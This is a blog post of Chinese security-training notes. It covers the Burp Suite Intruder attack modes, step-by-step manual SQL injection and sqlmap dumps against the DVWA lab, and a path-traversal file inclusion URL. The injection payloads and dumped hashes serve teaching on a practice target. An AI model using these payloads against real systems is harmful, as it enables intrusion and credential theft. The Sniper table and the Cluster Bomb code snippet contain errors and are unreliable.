【网络安全1x02】安恒厂家网络安全培训 --- day2

发表于 更新于

上午讲burpsuite的暴力破解模块,四种攻击模式。完事安装kali。

下午SQL注入,手工和sqlmap都有介绍,最后剩一点时间简单讲了点文件包含漏洞。

burpsuite–Intruder

抓包后右键Send to Intruder即可进行暴力破解,以下面这一段参数为例,被§§包围的部分(1)、(2)为需要破解的部分:

1
2
3
4
5
6
user=§user§&password=§password§&imageField.x=17&imageField.y=1
     (1)            (2)
---------------------------------------------------------- 
 payload1 = [user1,user2,user3]
 payload2 = [pass1,pass2,pass3]
----------------------------------------------------------

四种模式如下:

Sniper (狙击)

按顺序将(1)(2)其中之一中使用所给的payload进行替换,另一个参数不变。

payload只能设置一个,若使用payload2的话,破解尝试顺序为:

序号 user(1) password(2)
1 pass1 password
2 pass2 password
3 pass3 password
4 user pass1
5 user pass2
6 user pass3

Battering ram (撞击)

使用payload同时替换所有被选中的位置。

同样payload只能设置一个,使用payload2的话,破解尝试顺序为:

序号 user(1) password(2)
1 pass1 pass1
2 pass2 pass2
3 pass3 pass3

Pitchfork (交叉)

按顺序分别使用payload1替换(1),payload2替换(2),一一对应,payload数量较少的列表用完则停止。

payload可设置(1~替换位)个,使用payload1、payload2的话,破解尝试顺序为:

序号 user(1) password(2)
1 user1 pass1
2 user2 pass2
3 user3 pass3

破解方式python模拟代码如下:

1
2
3
for i in range( min(len(payload1),len(payload2)) ):
    user = payload1[i]
    password = payload2[i]

Cluster Bomb (集束炸弹)

通常意义上的穷举法。

payload可设置(1~替换位)个,使用payload1、payload2的话,破解尝试顺序为:

序号 user(1) password(2)
1 user1 pass1
2 user2 pass1
3 user3 pass1
4 user1 pass2
5 user2 pass2
6 user3 pass2
7 user1 pass3
8 user2 pass3
9 user3 pass3

破解方式python模拟代码如下:

1
2
3
4
for i in payload1:
    for j in payload2:
        user = payload1
        password = payload2

kali

之前装过了,虚拟机安装同理:

http://got17.cn/1010/

SQL注入

SQL注入漏洞—low

  1. 判断注入类型
1
1' or '1' = '1
  1. 猜列数
1
2
3
4
1' or 'a' = 'a' order by 1 #
1' or 'a' = 'a' order by 2 #
1' or 'a' = 'a' order by ... #
#二分查询(0~n)
  1. 获取字段顺序
1
2
3
4
5
6
7
8
9
10
11
1' union select 1,2 #


#回显
ID: 1' union select 1,2 #
First name: admin
Surname: admin

ID: 1' union select 1,2 #
First name: 1
Surname: 2
  1. 获取数据库名称
1
2
3
4
5
6
7
8
9
10
11
1' union select 1,database() #


#回显
ID: 1' union select 1,database() #
First name: admin
Surname: admin

ID: 1' union select 1,database() #
First name: 1
Surname: dvwa
  1. 获取数据库中的表
1
2
3
4
5
6
7
8
9
10
11
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #


#回显
ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
First name: admin
Surname: admin

ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
First name: 1
Surname: guestbook,users
  1. 查询表中字段名
1
2
3
4
5
6
7
8
9
10
11
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #


#回显
ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
First name: admin
Surname: admin

ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
First name: 1
Surname: user_id,first_name,last_name,user,password,avatar
  1. 打印数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #


#回显
ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: admin
Surname: admin

ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Gordon
Surname: Brown

ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Hack
Surname: Me

ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Pablo
Surname: Picasso

ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Bob
Surname: Smith

ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

sqlmap

1
2
3
4
5
6
7
8
9
#sql -u [url] 需要cookie,这里可以使用burpsuite抓一个包保存到本地sqlmap

sqlmap -r get.txt --dbs

sqlmap -r get.txt -D dvwa --tables

sqlmap -r get.txt -D dvwa -T users --columns

sqlmap -r get.txt -D dvwa -T users -C "user,password" --dump

文件包含漏洞

1
2
3
4
http://localhost/dvwa/vulnerabilities/fi/?page=file1.php

#修改?page=后文件目录
http://localhost/dvwa/vulnerabilities/fi/?page=../../robots.txt